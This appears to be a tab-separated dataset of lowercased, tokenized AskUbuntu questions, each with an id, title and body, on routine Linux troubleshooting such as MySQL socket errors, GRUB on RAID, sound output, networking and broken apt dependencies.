448094	ca n't connect to local mysql server through socket '/tmp/mysql_2.sock ' during manual installation of mysql	i get the error below when attempting to manually install mysql-5.6.17-linux-glibc2.5-x86_64 steps i followed : 1. tar -xzvf mysql-standard-5.1.34-linux-i686-glibc23.tar.gz 2. ln -s mysql-standard-5.1.34-linux-i686-glibc23 mysql a ) set basedir= to the full path of your new mysql directory b ) set datadir= to the full path of the /data subdir in your new mysql directory . 3 . set up the default mysql databases : a ) ./scripts/mysql_install_db -- defaults-file=mysql.cnf b ) ./bin/mysqladmin -- defaults-file=mysql.cnf -u root password `` yourpasswordhere '' 4 . create a new database and user account a ) log in to your mysql server as root : ./bin/mysql -- defaults-file=mysql.cnf -u root -p mysql.cnf file looks like : [ client ] socket=/tmp/mysql_2.sock port=3307 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # [ mysqld ] # required ! ! # change the basedir directory to reflect your mysql home directory basedir=/mysql # required ! ! # change the data direcory to reflect your mysql data directory datadir=/mysql/data port=3307 socket=/tmp/mysql_2.sock key_buffer_size=64m # [ optimization ] # set this value to 50 % of available ram if your environment permits . myisam_sort_buffer_size=1.5g # [ optimization ] # this value should be at least 50 % of free hard drive space . use caution if setting it to 100 % of free space however . your hard disk may fill up ! myisam_max_sort_file_size=100g # [ optimization ] # our default of 2g is probably fine for this value . change this value only if you are using a machine with little resources available . read_buffer_size=1.5g command : root @ ubuntu : /mysql # ./bin/mysqld_safe -- defaults- file=mysql.cnf & error : [ 1 ] 2386 root @ ubuntu : /mysql # 140415 19:08:12 mysqld_safe logging to '/mysql/data/ubuntu.err ' . chown : invalid user : `mysql ' 140415 19:08:12 mysqld_safe starting mysqld daemon with databases from /mysql/data 140415 19:08:12 mysqld_safe mysqld from pid file /mysql/data/ubuntu.pid ended ./bin/mysqladmin -- defaults-file=mysql.cnf -u ./bin/mysqladmin -- defaults-file=mysql.cnf -u root password 12345 ./bin/mysqladmin : connect to server at 'localhost ' failed error : 'ca n't connect to local mysql server through socket '/tmp/mysql_2.sock ' ( 2 ) ' check that mysqld is running and that the socket : '/tmp/mysql_2.sock ' exists ! [ 1 ] + done ./bin/mysqld_safe -- defaults-file=mysql.cnf i tried to login by command : ./bin/mysql -- defaults-file=mysql.cnf -u root -p error : enter password : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/tmp/mysql_2.sock ' ( 2 )
448100	trying to compile 'mips64 ' program with gcc 3.3 but it has an error when building binutils and gcc	i tried building binutils and gcc3.3 for mips64 and everything goes well until : make cc= $ gcc make install [ for make an error saying , that : gmp.h and confdefs.h are not found ] [ for make install : to make target install : stop ] i tried looking in my system for gmp.h and i found igmp.h instead and for confdefs.h i found nothing at all . it calls gmp gnu mp . is it possible to fix this error or not ? i am new to ubuntu .
448101	ca n't find or install package `` libiberty ''	i 'm running a ./configure script to install a program on a newly installed 13.10 ubuntu . i 'm told that libiberty should come with binutils or gcc , but it is not being found . there is no information on http : //gcc.gnu.org/onlinedocs/libiberty/ that i am able to make use of . i do n't know how to install packages without using apt . i can add a repo to the sources though .
448102	how can i perform a dist-upgrade with held back packages	i 'm currently running 13.04 with cinnamon on my thinkpad e520 . i 've installed an earlier version of xserver-xorg-video-intel because newer versions just do n't work and to stop it being upgraded/updated i held it back . i now want to perform a dist upgrade but i ca n't because of this held back package . is there any way around this , so that i can upgrade without having to update this package ? thanks
448103	ubuntu is not booting up	i have installed a apps from ubuntu software center namely `` mount manager '' to mount few of my ntfs drive automatically when i login . after installation and configuration i have restarted ubuntu to check if it works . now , ubuntu not booting up , i can only see a ubuntu logo and a loading indicator infinitely going on . after couple of restarting , i have started ubuntu in 'recovery mode ' , where i have seen ' : permission denied ' for couple of drives and all under 'mountall : mount/ : permission denied ' also , today when i tried again to boot , i found another message -- > fsck from util-linux 2.20.1 mountall : mount / [ 596 ] : permission denied
448104	how to deactivate headphones output	i 've got a broken piece of jack stuck into my headphones output : i can not get any sound from my laptop speakers . i 've tried many things ( using alsamixer , pavucontrol , checking the different mute controls and so on ) , but i still ca n't get any sound from my internal speakers . i deactivated the automatic mute on the alsamixer , but it 's still the same . my speakers are working : on windows ( dual boot i want to stop.. ) , i just have to deactivate the headphones output to have the speakers playing my music ! i just discovered the pactl command , which learnt me a lot about my issue . for instance , i execute the pactl list cards command , and here is a part of my output : analog-output-speaker : haut-parleurs ( priority : 10000 , latency offset : 0 usec , not available ) properties : device.icon_name = `` audio-speakers '' part of profile ( s ) : output : analog-stereo , output : analog-stereo+input : analog-stereo , output : analog-stereo+input : iec958-stereo , output : analog-surround-40 , output : analog-surround-40+input : analog-stereo , output : analog-surround-40+input : iec958-stereo analog-output-headphones : casques analogiques ( priority : 9000 , latency offset : 0 usec , available ) properties : device.icon_name = `` audio-headphones '' part of profile ( s ) : output : analog-stereo , output : analog-stereo+input : analog-stereo , output : analog-stereo+input : iec958-stereo so ! the analog-output-speaker port is tagged as not available , and the analog-output-headphones is tagged as available . as i said , i really ca n't take the broken piece of jack out of the output . i thought that if i could completely deactivate the headphones output , my speaker output would become available , but i 'm not sure . and i absolutely have no clue about how i can achieve this . could someone help me , please ? my computer is a mac book pro 8.2 ( device.product.name = `` apple macbookpro8,2 [ core i7 , 15\ '' , 2011 ] '' ) , and eveything else is working fine . thank you , [ edit ] as asked in comments , here is a pastebin for pact list : http : //pastebin.ubuntu.com/7255739/
448108	ubuntu 12.04 has no permanent sound or runs out of it at a times ?	i have installed ubuntu for like 3 times . every time i did it a problem eventually appeared ; something related with a disk , or that i created too many partitions . i decided to do it one more time so i took and stored my personal files into another disk . i downloaded the last ubuntu 12.04 version ( and this is something interesting ) , because at the time i was mounting it in linux usb installer it showed a message saying : `` it does not support that version , it would make it comppatible to 13.10 though '' . now , the problem is that as i said i have no permanent sound . in order to have it temporary , i must press mute button and going into what i want to listen inmediately . what i am trying to say is that if i press the mute button and wait for 2 minutes to listen to something , it does not sound ; i must press and listen , otherwise i have no sound . i saw on internet a problem that consisted in switching off the mute mode , it was neccesary to disable it writing the command `` alsamixer '' ; i did it and the problem continues . any help , please . thanks
448109	ubuntu internet problem	i just installed ubuntu . i have no set correctly my internet configuration . here are my settings : ifconfig : eth0 ( inet adr 192.168.10.101 ) eth1 ( no ip address ) lo ( inet adr 127.0.0.1 ) output of my /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 inet static address 10.1.18.16 netmask 255.255.255.0 gateway 10.1.18.1 broadcast 10.1.18.255 when i did service network-manager restart , my ifconfig is changed to the above output . ping 8.8.8.8 fails ping www.google.com fails my /etc/resolv.conf is this nameserver any help , please ?
448110	local share access problem	since my last boot i 've been having a weird issue : i can easily access the internet , and ping various websites , however i ca n't ping any address on my local network . i 'm running ubuntu 13.10 with gnome 3 desktop . this is my routing table : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 * 255.255.255.0 u 9 0 0 wlan0 i have no idea if the metric is wrong but i would n't know how to change that anyway . does anyone have a solution ? what more information do you need me to post to figure out the issue ? thanks for the help
448114	how can i select all untagged photos in shotwell ?	i would like to be able , to select all untagged and tagged photos in shotwell separately , so that i may tag and re-tag them . how can i do this ?
448119	php-opencloud with openstack installed locally	i have a question that can we use php-opencloud for building applications for openstack that is installed locally on a single machine running all services ? i have a doubt that that is only for rackspace ? tell me i am wrong
448120	how can i disable the network status notification bubbles ?	i 'm using the latest version of ubuntu , with a wi-fi adaptor that ubuntu detected flawlessly . when the internet drops out , ubuntu gives me a notification bubble in the top right of the screen , e.g . `` wireless network , disconnected '' . there is no clickable `` x '' on these notifications and i ca n't seem to stop them from returning over and over and over , about once every 5 seconds . to make matters worse , i ca n't access the network settings menu in the top right of the screen , because every time i open the network settings meny , a notification bubble pops up and cancels the menu . this means i ca n't configure my network , which is what ubuntu is complaining about . so , the short question : how can i disable those notification bubbles ? or , what must i do to acknowledge a bubble so that it does n't pop up again and again and again unless there has been a significant other event ?
448121	getting `` server unexpectedly closed network connection ''	i created vm by using jclouds api and by giving the public address in putty login into the vm . i tried to install gui in vm by giving the below command sudo apt-get install ubuntu-desktop it is installed but while rebooting the ubuntu server i am losing internet connection getting message like below : sudo reboot server unexpectedly closed network connection then the server wo n't respond . err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en fetched 1,384 kb in 5s ( 235 kb/s ) w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3-next/ubuntu/dists /precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3-next/ubuntu/dists /precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3-next/ubuntu/dists /precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . ubuntu @ ip-172-31-20-201 : ~ $ sudo apt-get install gnome-shell ubuntu-gnome-desktop reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-gnome-desktop
448125	jockey-text is not working	i have ubuntu 12.04 , just learning linux . i ran jockey-text -- list and got no results . then i ran jockey-text -u and got the following results : emmett @ emmett-linux : ~ $ jockey-text -u traceback ( most recent call last ) : file `` /usr/bin/jockey-text '' , line 128 , in < module > sys.exit ( u.run ( ) ) file `` /usr/lib/python2.7/dist-packages/jockey/ui.py '' , line 418 , in run self.backend ( ) .update_driverdb ( ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken does this mean something is broken in jockey-text ?
448127	finding the path of kernel source code	i have the following situation . let 's say , i have 3 kernel images installed in my system . but currently , image 3.0.0-generic is running . and the source code for all three kernels are located at different paths . so now , if i wanted to find the source of currently running kernel image , how do i do that ? i know uname -r will give the current kernel image . but how do i find the path of the resulting kernel ?
448133	ubuntu boot problem new install 13.10x64	a few days ago i purchased a new laptop toshiba z30 a134 . i tried to install ubuntu 13.10.amd 64 , but after showing me that the installation is completed and you must restart the computer shows me the following error : insert system disk in drive.press any key when ready ... . try different distributions of ubuntu but same problem . in the boot menu i 'm turn off security boot , and *boot mode*is uefi boot .
448135	how do i get grub to install on a raid array ?	i am trying to build an ubuntu desktop machine with raid array , and am having trouble with the installation of grub . the 2 10gb hdds are partitioned using sgdisk ( invoked by a script to ensure identical structures ) to create gpt partitions as follows : 1 : 1mib , not raid , unformatted , bios-grub flag 2 : 200mib , raid1 , ext2 , /boot 3 : 2gib , raid1 , swapfs , ( swap ) 4 : 5gib , raid1 , ext4 , /var 5 : 5gib , raid1 , ext4 , /tmp 6 : 6gib , raid1 , ext4 , / ( root ) 7 : 22gib , raid1 , ext4 , /usr 8 : remainder , raid1 , ext4 , /home after starting the live-dvd ( either 13.10 or 12.04 , they behave identically ) and configuring network address , i install mdadm , and run sudo mdadm -- assemble -- scan which reports all 7 raid sets started ok . in the installation i choose the `` something else '' partitioning option , and distribute the installation as indicated above . at the grub installation section i get the response that grub can not install to /dev/sda , and that this is a fatal error . the window offers the options to install to a different drive , continue without installing grub , or abort . i can select any of the options , but the `` ok '' button never becomes active and thus i can not proceed . it appears that the installation has crashed , although the system monitor shows no sign of cpu hogging . however , if i try installing from the server-cd ( which has mdadm included ) of 13.10 , the installation completes without any problem whatsoever , so the partition setup is clearly raid-capable with ubuntu . similarly , if i install from the alternate-dvd then it does so perfectly . but that restricts me to the lts version , which is not what i want at the moment . ( and yes , i 'm aware that the next lts is imminent ) . alternatively , if i do not combine the /boot partitions as a raid array but leave them independent , then grub installs with no problem . that , of course , leaves me without the protection of the mirror . i have searched in `` askubuntu '' , but have not ( yet ) been able to find anything that solves my problem . in /dev/mapper there is only `` control '' ( suggestion from jeff atwood ) . have i perhaps omitted some obscure preliminary action with mdadm ? or is there some other preparatory action i should have performed ? any assistance would be very much appreciated . ta muchly clangerman my machine is built : mobo : asus m4a89td pro/usb3 rev 1.01gx cpu : amd phenom ii x4 960t 3.0ghz 8mb 95w black ram : 2x4gib kingston hyper blu khx1600c9d3b1k2/8gx graphics : nvidia nvs 285 thank you , psusi . syslog reports as follows ( extract of zone of interest ) : apr 16 20:29:56 ubuntu os-prober : debug : /dev/sdb7 : part of software raid array apr 16 20:29:56 ubuntu os-prober : debug : /dev/sdb8 : part of software raid array apr 16 20:29:56 ubuntu grub-installer : info : installing grub on '/dev/sda /dev/sdb' apr 16 20:29:56 ubuntu grub-installer : info : grub-install does not support -- no-floppy apr 16 20:29:56 ubuntu grub-installer : info : running chroot /target grub-install -- force `` /dev/sda '' apr 16 20:29:56 ubuntu grub-installer : path `/boot/grub ' is not readable by grub on boot . installation is impossible . aborting . apr 16 20:29:56 ubuntu grub-installer : error : running 'grub-install -- force `` /dev/sda '' ' failed . apr 16 20:31:22 ubuntu kernel : [ 2004.531675 ] usb 1-2.1 : new high-speed usb device number 3 using ehci-pci apr 16 20:31:22 ubuntu kernel : [ 2004.627008 ] usb 1-2.1 : new usb device found , idvendor=0951 , idproduct=1603 apr 16 20:31:22 ubuntu kernel : [ 2004.627011 ] usb 1-2.1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 apr 16 20:31:22 ubuntu kernel : [ 2004.627013 ] usb 1-2.1 : product : datatraveler 2.0000000000000000 apr 16 20:31:22 ubuntu kernel : [ 2004.627015 ] usb 1-2.1 : manufacturer : kingston apr 16 20:31:22 ubuntu kernel : [ 2004.627016 ] usb 1-2.1 : serialnumber : 00000000000000000000219e apr 16 20:31:22 ubuntu kernel : [ 2004.627249 ] usb-storage 1-2.1:1.0 : usb mass storage device detected apr 16 20:31:22 ubuntu kernel : [ 2004.627310 ] scsi9 : usb-storage 1-2.1:1.0 apr 16 20:31:23 ubuntu kernel : [ 2005.627426 ] scsi 9:0:0:0 : direct-access kingston datatraveler 2.0 1.00 pq : 0 ansi : 2 i suspect that the sixth line ( /boot/grub not readable ) is the significant one . /boot/grub contains two files : -rw-r -- r -- 1 root root 699 oct 16 20:03 gfxblacklist.txt -rw-r -- r -- 1 root root 1024 oct 16 21:01 grubenv the former sounds irrelevant , the latter contains : # grub environment block # # # ( continuous stream of `` # '' characters to 12.5 lines in the terminal window ) anyway , i suspect that the /boot/grub being accessed is that of the live-cd system rather than of the raid-build , and so inappropriate anyway . your further advice would be most welcome , and of course if you would like to see further information then do please ask . thank you so much . c .
448137	is wine what i think it is ?	my first impression is that wine is a simulated windows environment which uses free ( and presumably open source ) libraries as an alternative to microsoft 's proprietary libraries . those libraries produce the same input and output , yet use alternative means to process the data . this would explain why there is very little performance hit . is my impression of what exactly wine is correct ? has anyone noticed a performance loss from wine ( relative to actual windows ) ?
448144	how to use qaudiooutput in ubuntu touch	when i run qaudiooutput on ubuntu touch in confinement , it reports permission error . basically it is trying to create a directory in /run/user/*/pulse which is rejected by the confinement . how to use qaudiooutput , and what are other alternatives on touch .
448149	menu options disabled in most application in ubuntu 13.10	the menu options such as file/edit etc . are disabled for most of my applications such as terminal , ubuntu software center and many more . i am unable to get my work done because of this . i am running ubuntu 13.10 64-bit and using gnome shell ( v3.10.1 ) . is there a reason why this is happening ? please , need help !
448152	ca n't install fancontrol	i am starting to get quite p'ed off as i ca n't control my fans . i ca n't download jupiter . it says ca n't find and if i try apt-get install fancontrol it says : root @ server-17 : ~ # apt-get install fancontrol reading package lists ... done building dependency tree reading state information ... done package fancontrol is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'fancontrol ' has no installation candidate root @ server-17 : ~ # help please : (
448155	how to fully convert ubuntu to ubuntu gnome ( not just installing gnome ) ?	i 've been using ubuntu since 7.10 on a number of different computers . i 'm currently using 13.10 on my home computer and 13.04 on my work computer . i prefer the gnome 3 desktop experience and it 's working great on my 13.04 computer . i recently switched to gnome 3 from unity back in 12.04 and have been upgrading with each official release . i did not upgrade my work computer due to a number of complications with gnome 3 after upgrading to 13.10 . i 've tried the official gnome ppa 's and also completely purging gnome and re-installing it ( with and without ppa 's , tried both ways ) . still having issues . that being said , i would like to switch to using a pure ubuntu gnome rather than ubuntu with gnome installed . i am hoping to avoid the conflicts i 've been experiencing and wonder if there was a way to convert my existing ubuntu install to be recognized as a ubuntu gnome install so that when i upgrade to 14.04 it will follow the full ubuntu gnome upgrade process rather than the regular ubuntu process . i realize i could `` simply '' ( not really that simple ) install ubuntu gnome on a freshly formatted computer , but i really would rather not have to go through that process if i can help it . so , is it possible to modify my ubuntu install in some way ( ppa 's , config files , something else ? ) to have it recognized as ubuntu gnome ? does anyone know ? thanks !
448158	my ubuntu 12 .04 will not update	hi i 'm having problems updating my ubuntu 12.04 , when i type sudo apt-get update i get this howie @ ubuntu : ~ $ sudo apt-get update [ sudo ] password for howie : get:1 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //dl.google.com stable release hit http : //archive.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-updates release.gpg hit http : //security.ubuntu.com precise-security release.gpg hit http : //ppa.launchpad.net precise release.gpg get:2 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com precise release hit http : //security.ubuntu.com precise-security release hit http : //archive.ubuntu.com precise-updates release ign http : //dl.google.com stable release ign http : //dl.google.com stable/main amd64 packages/diffindex ign http : //dl.google.com stable/main i386 packages/diffindex get:3 http : //ppa.launchpad.net precise release [ 11.9 kb ] ign http : //dl.google.com stable/main translationindex hit http : //dl.google.com stable/main amd64 packages hit http : //dl.google.com stable/main i386 packages hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex hit http : //archive.ubuntu.com precise-updates/main amd64 packages hit http : //archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //archive.ubuntu.com precise-updates/universe amd64 packages hit http : //archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //archive.ubuntu.com precise-updates/main i386 packages hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise-updates/restricted i386 packages hit http : //archive.ubuntu.com precise-updates/universe i386 packages hit http : //archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:4 http : //ppa.launchpad.net precise/main sources [ 29.5 kb ] get:5 http : //ppa.launchpad.net precise/main amd64 packages [ 18.6 kb ] get:6 http : //ppa.launchpad.net precise/main i386 packages [ 18.6 kb ] ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en fetched 79.1 kb in 3s ( 22.4 kb/s ) reading package lists ... done w : gpg error : http : //dl.google.com stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 howie @ ubuntu : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libgail-3-0 : depends : libgtk-3-0 ( = 3.4.2-0ubuntu0.6 ) but 3.4.2-0ubuntu0.8 is installed libgtk-3-bin : depends : libgtk-3-common ( = 3.4.2-0ubuntu0.6 ) but 3.4.2-0ubuntu0.8 is installed e : unmet dependencies . try using -f. howie @ ubuntu : ~ $ apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? howie @ ubuntu : ~ $ i also have a red dot with a white line across it in the top right screen . i am not very good on computers so any would be much appreciated as i want to upgrade to the newest version . i get this howie @ ubuntu : ~ $ sudo apt-get install -f [ sudo ] password for howie : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libkrb5-3 : i386 libgconf-2-4 : i386 libatk1.0-0 : i386 libk5crypto3 : i386 libstdc++6 : i386 libxfixes3 : i386 libxcomposite1 : i386 libldap-2.4-2 : i386 libroken18-heimdal : i386 libidn11 : i386 libnss3 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 linux-headers-3.2.0-35 libdbus-glib-1-2 : i386 libasn1-8-heimdal : i386 libnspr4-0d : i386 libcairo2 : i386 libgnutls26 : i386 libgssapi3-heimdal : i386 libtasn1-3 : i386 libfreetype6 : i386 libexpat1 : i386 libdatrie1 : i386 libavahi-common-data : i386 libgconf2-4 : i386 libgdk-pixbuf2.0-0 : i386 libxcb1 : i386 libp11-kit0 : i386 libwind0-heimdal : i386 libxau6 : i386 libpixman-1-0 : i386 libcups2 : i386 libcurl3 : i386 libxinerama1 : i386 libkrb5support0 : i386 gir1.2-unique-3.0 libxft2 : i386 libxdmcp6 : i386 libgcrypt11 : i386 linux-headers-3.2.0-35-generic libthai0 : i386 libkeyutils1 : i386 libasound2 : i386 libxrender1 : i386 libhcrypto4-heimdal : i386 libnspr4 : i386 libhx509-5-heimdal : i386 libxss1 : i386 libheimbase1-heimdal : i386 libtiff4 : i386 libjasper1 : i386 libudev0 : i386 libavahi-client3 : i386 libx11-6 : i386 libsasl2-2 : i386 libfontconfig1 : i386 libpango1.0-0 : i386 libheimntlm0-heimdal : i386 libxdamage1 : i386 libxcb-render0 : i386 librtmp0 : i386 libgssapi-krb5-2 : i386 libxi6 : i386 libxcursor1 : i386 libxcb-shm0 : i386 libxext6 : i386 libsasl2-modules : i386 libavahi-common3 : i386 libxrandr2 : i386 libnss3-1d : i386 libsqlite3-0 : i386 libgtk2.0-0 : i386 libkrb5-26-heimdal : i386 libssl1.0.0 : i386 libgpg-error0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libgail-3-0 libgtk-3-bin the following packages will be upgraded : libgail-3-0 libgtk-3-bin 2 upgraded , 0 newly installed , 0 to remove and 202 not upgraded . 2 not fully installed or removed . need to get 0 b/39.9 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libgail-3-0 : libgail-3-0 depends on libgtk-3-0 ( = 3.4.2-0ubuntu0.6 ) ; however : version of libgtk-3-0 on system is 3.4.2-0ubuntu0.8 . dpkg : error processing libgail-3-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of libgtk-3-bin : libgtk-3-bin depends on libgtk-3-common ( = 3.4.2-0ubuntu0.6 ) ; however : version of libgtk-3-common on system is 3.4.2-0ubuntu0.8 . dpkg : error processing libgtk-3-bin ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libgail-3-0 libgtk-3-bin e : sub-process /usr/bin/dpkg returned an error code ( 1 ) howie @ ubuntu : ~ $ apt-get install -f with sudo : sudo apt-get install -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? howie @ ubuntu : ~ $ apt-get install -f with sudo : sudo apt-get install -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? howie @ ubuntu : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libkrb5-3 : i386 libgconf-2-4 : i386 libatk1.0-0 : i386 libk5crypto3 : i386 libstdc++6 : i386 libxfixes3 : i386 libxcomposite1 : i386 libldap-2.4-2 : i386 libroken18-heimdal : i386 libidn11 : i386 libnss3 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 linux-headers-3.2.0-35 libdbus-glib-1-2 : i386 libasn1-8-heimdal : i386 libnspr4-0d : i386 libcairo2 : i386 libgnutls26 : i386 libgssapi3-heimdal : i386 libtasn1-3 : i386 libfreetype6 : i386 libexpat1 : i386 libdatrie1 : i386 libavahi-common-data : i386 libgconf2-4 : i386 libgdk-pixbuf2.0-0 : i386 libxcb1 : i386 libp11-kit0 : i386 libwind0-heimdal : i386 libxau6 : i386 libpixman-1-0 : i386 libcups2 : i386 libcurl3 : i386 libxinerama1 : i386 libkrb5support0 : i386 gir1.2-unique-3.0 libxft2 : i386 libxdmcp6 : i386 libgcrypt11 : i386 linux-headers-3.2.0-35-generic libthai0 : i386 libkeyutils1 : i386 libasound2 : i386 libxrender1 : i386 libhcrypto4-heimdal : i386 libnspr4 : i386 libhx509-5-heimdal : i386 libxss1 : i386 libheimbase1-heimdal : i386 libtiff4 : i386 libjasper1 : i386 libudev0 : i386 libavahi-client3 : i386 libx11-6 : i386 libsasl2-2 : i386 libfontconfig1 : i386 libpango1.0-0 : i386 libheimntlm0-heimdal : i386 libxdamage1 : i386 libxcb-render0 : i386 librtmp0 : i386 libgssapi-krb5-2 : i386 libxi6 : i386 libxcursor1 : i386 libxcb-shm0 : i386 libxext6 : i386 libsasl2-modules : i386 libavahi-common3 : i386 libxrandr2 : i386 libnss3-1d : i386 libsqlite3-0 : i386 libgtk2.0-0 : i386 libkrb5-26-heimdal : i386 libssl1.0.0 : i386 libgpg-error0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libgail-3-0 libgtk-3-bin the following packages will be upgraded : libgail-3-0 libgtk-3-bin 2 upgraded , 0 newly installed , 0 to remove and 202 not upgraded . 2 not fully installed or removed . need to get 0 b/39.9 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libgail-3-0 : libgail-3-0 depends on libgtk-3-0 ( = 3.4.2-0ubuntu0.6 ) ; however : version of libgtk-3-0 on system is 3.4.2-0ubuntu0.8 . dpkg : error processing libgail-3-0 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of libgtk-3-bin : libgtk-3-bin depends on libgtk-3-common ( = 3.4.2-0ubuntu0.6 ) ; however : version of libgtk-3-common on system is 3.4.2-0ubuntu0.8 . dpkg : error processing libgtk-3-bin ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libgail-3-0 libgtk-3-bin e : sub-process /usr/bin/dpkg returned an error code ( 1 )
